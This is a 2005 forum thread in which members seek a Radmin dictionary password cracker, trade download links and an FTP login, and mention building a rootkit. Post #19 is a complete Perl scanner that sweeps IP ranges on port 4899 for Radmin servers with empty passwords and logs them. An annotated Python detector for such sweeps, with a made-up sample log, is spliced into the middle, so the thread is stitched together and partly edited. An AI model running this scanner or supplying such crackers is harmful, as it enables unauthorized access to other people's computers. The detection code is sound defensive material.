Government Security
Network Security Resources

Radmin Brute Force Password Attack

27 replies to this topic

#16 Yevilknight

Yevilknight

    Private

  • Members
  • 9 posts

Posted 21 March 2005 - 11:12 AM

I'm searching for

Nova's Radmin Dictionary Password Hacker

but I didn't find it with Google and the download URL is down!
Can anybody give me this program??

#17 ViBi

ViBi

    Private

  • Members
  • 8 posts

Posted 22 March 2005 - 02:35 AM

Oh, it would be really nice if someone could upload that file again.

I supply the (free) space ;)

ftp://gmgkrdnp:govsec@home.arcor.de
http://home.arcor.de/gmgkrdnp/


//Edit: I tried ViXSCAN, but a non-GUI bruter like SQLck would be quite a bit handier

#18 twistedps

twistedps

    Staff Sergeant

  • Members
  • 271 posts

Posted 23 March 2005 - 10:22 PM

I've always been skeptical about brute forcing Radmin, and without using this script method, I don't know how it's done. I researched Radmin stuff a while ago, and it's all key-based encryption when it's sent out, so it's a different hash being sent out. Unless you knew the key to that hash each time, and then encoded it, I don't know of a way to do it via pure programming without the hash algorithm.
VIXVVXIV, can you shed some light on the subject?

#19 Web-Hack

Web-Hack

    Private

  • Members
  • 9 posts

Posted 24 March 2005 - 01:38 PM

#!/usr/bin/perl
##################################################
#           Radmin with empty password scanner
#
#                   usage: ./scan.pl 213.59.*.*
#  thanx to Forb
#             Coded by  Satir (satir@cyberlords.net) from CyberLords [cyberlords.net]
##################################################

$|++;

use IO::Socket;

$pids = 10;          ## Count of threads (forked children per round)
$port = 4899;        ## Default port
$tout = 5;           ## Default timeout (seconds, used for the TCP connect)
$log  = 'scan.log';  ## Default logfile

$once  = 0;
$fatal = 0;

## Split the hostmask into its four octets; '*' in an octet means "all"
if ($ARGV[0] =~ /((.*)\.(.*)\.(.*)\.(.*))/) {
    $netmask = $1;
    $n1 = $2;
    $n2 = $3;
    $n3 = $4;
    $n4 = $5;
}

quit("Incorrect port") if ($port =~ /\D/);
quit("No hostmask given") unless $netmask;
check();

while (1) {
    ## one slice of $pids hosts per round (the original sliced $pids+1 and
    ## advanced by $pids, so every 11th host was checked twice)
    @ips = @ipz[$once .. $once + $pids - 1];
    for ($i = 0; $i < $pids; $i++) {
        unless ($ips[$i]) {
            killpidz();
            exit print "Scan is complete\n";
        }
        if ($pid = fork()) {
            push(@forked, $pid);
        } else {
            $res = check_radmin($ips[$i], $port);
            logg($ips[$i], $res) if ($res ne 0);
            exit;
        }
    }
    $once += $pids;
    killpidz();
}

## Expand the hostmask (e.g. 213.59.*.*) into the list of addresses to scan
sub check {
    for ($i = 0; $i <= 254; $i++) {
        $ipi = $i;
        if ($n2 ne '*') { $i = 254, $ipi = $n2 }
        for ($j = 0; $j <= 254; $j++) {
            $ipj = $j;
            if ($n3 ne '*') { $j = 254, $ipj = $n3 }
            for ($k = 1; $k <= 254; $k++) {
                $ipk = $k;
                ## original read "$ipi = $n2" here, which ignored a fixed last octet
                if ($n4 ne '*') { $k = 254, $ipk = $n4 }
                my ($ipaddr) = "$n1\.$ipi\.$ipj\.$ipk";
                chomp($ipaddr);
                push(@ipz, $ipaddr);
            }
        }
    }
}

sub quit {
    my ($reason) = @_;
    print "$reason\n" if $reason;
    exit;
}

## Append one result line per responding host to the logfile
sub logg {
    my ($ip, $ans) = @_;
    open(LOGG, ">>$log");
    $str = "NULL PASS!!!" if $ans eq 1;
    $str = "need pass."   if $ans eq 2;
    print LOGG "$ip:$port : $str\n";
    close(LOGG);
}

## Reap the children of the current round before starting the next one
sub killpidz {
    foreach (@forked) {
        chomp;
        waitpid($_, 0);
        kill("TERM" => $_);
    }
    undef @forked;
}

## Returns 0 = no connection, 1 = server answered the empty-password probe
## with the "a080" marker, 2 = connected but a password is required
sub check_radmin {
    ($host, $port) = @_;

    ## original had "Photo => 'tcp'" (extraction artifact); IO::Socket::INET
    ## needs Proto, and Timeout makes the $tout setting above actually apply
    $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
                                  Proto    => "tcp", Timeout  => $tout);

    if ($sock) {
        $sock->send("\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08");
        $sock->recv($data, 1024);
        close($sock);

        ## hex-encode the reply byte by byte and look for the marker
        @marks  = split(//, $data);
        $string = '';
        foreach (@marks) {
            $string .= unpack('H8', $_);
        }
        if ($string =~ /a080/g) {
            return 1;
        } else {
            return 2;
        }
    } else {
        return 0;
    }
}
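A defender-side example added for this thread (it is not part of the script above or of any tool the posters mention): the scanner above connects to TCP/4899 on every host in a mask, ten hosts per round, and closes each connection after a single send/recv. On a perimeter device that sweep looks like one source reaching many distinct destinations on port 4899 in a short time. The code below parses constructed firewall-style connection records (the `src=... dst=... dport=... proto=...` layout is an assumption made for the example, not Radmin's log format or any vendor's) and flags sources that reach a threshold of distinct TCP/4899 targets inside a sliding time window. Out-of-order lines, non-TCP records, other ports and junk lines are handled.

```python
"""Flag horizontal sweeps of TCP/4899 (Radmin) in connection logs.

Added example for this thread; not part of the scanner posted above.
The record layout below is an assumption made for the example.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

RADMIN_PORT = 4899

# Generic key=value firewall-style record (assumed layout, constructed here)
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ conn src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)"
)

# Constructed sample: 198.51.100.7 sweeps ten hosts on 4899 in ten seconds,
# 203.0.113.5 is an admin reconnecting to one host, 198.51.100.9 touches
# three hosts, plus one non-Radmin port, one UDP record and one junk line.
SAMPLE_LOG = """\
2005-03-24T13:38:01 fw1 conn src=198.51.100.7 dst=192.0.2.1 dport=4899 proto=tcp action=allow
2005-03-24T13:38:02 fw1 conn src=198.51.100.7 dst=192.0.2.2 dport=4899 proto=tcp action=allow
2005-03-24T13:38:03 fw1 conn src=198.51.100.7 dst=192.0.2.3 dport=4899 proto=tcp action=allow
2005-03-24T13:38:04 fw1 conn src=198.51.100.7 dst=192.0.2.4 dport=4899 proto=tcp action=allow
2005-03-24T13:38:05 fw1 conn src=198.51.100.7 dst=192.0.2.5 dport=4899 proto=tcp action=allow
2005-03-24T13:38:06 fw1 conn src=198.51.100.7 dst=192.0.2.6 dport=4899 proto=tcp action=allow
2005-03-24T13:38:07 fw1 conn src=198.51.100.7 dst=192.0.2.7 dport=4899 proto=tcp action=allow
2005-03-24T13:38:08 fw1 conn src=198.51.100.7 dst=192.0.2.8 dport=4899 proto=tcp action=allow
2005-03-24T13:38:09 fw1 conn src=198.51.100.7 dst=192.0.2.9 dport=4899 proto=tcp action=allow
2005-03-24T13:38:10 fw1 conn src=198.51.100.7 dst=192.0.2.10 dport=4899 proto=tcp action=allow
2005-03-24T13:38:03 fw1 conn src=203.0.113.5 dst=192.0.2.20 dport=4899 proto=tcp action=allow
2005-03-24T13:40:03 fw1 conn src=203.0.113.5 dst=192.0.2.20 dport=4899 proto=tcp action=allow
2005-03-24T13:38:04 fw1 conn src=198.51.100.9 dst=192.0.2.30 dport=4899 proto=tcp action=allow
2005-03-24T13:38:05 fw1 conn src=198.51.100.9 dst=192.0.2.31 dport=4899 proto=tcp action=allow
2005-03-24T13:38:06 fw1 conn src=198.51.100.9 dst=192.0.2.32 dport=4899 proto=tcp action=allow
2005-03-24T13:38:07 fw1 conn src=198.51.100.9 dst=192.0.2.33 dport=80 proto=tcp action=allow
2005-03-24T13:38:08 fw1 conn src=198.51.100.7 dst=192.0.2.40 dport=4899 proto=udp action=deny
this line is not a connection record
"""


def parse_line(line):
    """Return a dict for one record, or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m.group("ts")),
        "src": m.group("src"),
        "dst": m.group("dst"),
        "dport": int(m.group("dport")),
        "proto": m.group("proto"),
    }


def find_sweeps(lines, port=RADMIN_PORT, window_s=60, min_targets=8):
    """Map each source that reached >= min_targets distinct hosts on `port`
    (TCP) inside some window_s-second sliding window to that peak count."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["proto"] == "tcp" and ev["dport"] == port:
            by_src[ev["src"]].append((ev["ts"], ev["dst"]))

    window = timedelta(seconds=window_s)
    alerts = {}
    for src, events in by_src.items():
        events.sort()           # log lines are not guaranteed to be ordered
        in_window = Counter()   # dst -> hits currently inside the window
        left, peak = 0, 0
        for ts, dst in events:
            in_window[dst] += 1
            # slide the left edge forward until every event fits in the window
            while ts - events[left][0] > window:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_targets:
            alerts[src] = peak
    return alerts


if __name__ == "__main__":
    for src, n in find_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"possible Radmin sweep from {src}: {n} distinct hosts on tcp/{RADMIN_PORT}")
```

The threshold and window are the tuning knobs: a single administrator reconnecting to the same host never raises the distinct-target count, so legitimate Radmin use stays below the bar, while a /24 sweep trips it within seconds. Radmin's own connection log, which one poster in this thread notes records every attempt, is a second place to run the same count per source.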


#20 SantaSemperChi

SantaSemperChi

    Private First Class

  • Members
  • 30 posts

Posted 27 March 2005 - 12:10 AM

@ VIX:
On your website the Radmin brute package is corrupted; I tried to unzip it but it shows me an error like "archive is damaged or it is an unknown format" :ph34r:

#21 alzeimeur

alzeimeur

    Private

  • Members
  • 15 posts

Posted 27 March 2005 - 02:12 PM

The link to the program is down :(

Can Nova or anyone else repost it? :)

Thanks in advance


al"

#22 Lanstat

Lanstat

    Private

  • Members
  • 8 posts

Posted 03 April 2005 - 10:56 PM

It worked great, but I have a few suggestions.
It should automatically close the previous windows.
And isn't there an option to use a proxy or something similar?

I tried it on my local PC, but everything was logged.

#23 hcoca

hcoca

    Private First Class

  • Members
  • 30 posts

Posted 28 May 2005 - 07:56 AM

> The link to the program is down :(
>
> Can Nova or anyone else repost it? :)
>
> Thanks in advance
>
> al"

Why don't you try Nova's site...

#24 q7x

q7x

    Private

  • Members
  • 10 posts

Posted 29 May 2005 - 09:17 AM

Thanks,
but you can use hash tables.
Hash tables are a very fast and easy method.
Nima Salehi www.Ashiyane.ir

#25 Guest_jhdscript_*

Guest_jhdscript_*
  • Guests

Posted 30 May 2005 - 03:20 AM

Can you explain the method using hashes?

#26 PsyXhO

PsyXhO

    Private

  • Members
  • 16 posts

Posted 20 June 2005 - 12:14 PM

Pretty nice script, but:

Access forbidden!
You don't have permission to access the requested object. It is either read-protected or not readable by the server.


Seconding alzeimeur's request, do you think you could provide us with another link?

Thanks :)

#27 Tyler

Tyler

    Master Sergeant

  • Members
  • 838 posts

Posted 21 June 2005 - 12:42 PM

I also get access forbidden, probably because of the use of bandwidth. I would prefer a compiled version if possible so that I can test it out. I know it's still beta, but if someone can host it I am interested in trying it out. Thanks for all the hard work you have done to put into it. I myself have been trying to program a rootkit so that all you have to do is type site exec radmin.exe <port>, but it only seems to work with parameters. If any of you know how to do it by incorporating the parameters in a string, so you have something like radmin.exe, and if you leave it blank it has a default port of something like 29932 or something random, and then if you put the port after, like radmin.exe <port>, it would be saved as that port. I have spent a lot of time trying to do this and haven't had too much success, so if you could let me know that would be awesome :)

#28 alexj

alexj

    Private

  • Members
  • 1 posts

Posted 19 July 2011 - 06:24 AM

Can somebody upload this again, because I really need it. I need to find out the password in a LAN.





Also tagged with one or more of these keywords: windows, server, bug, tools, dictionary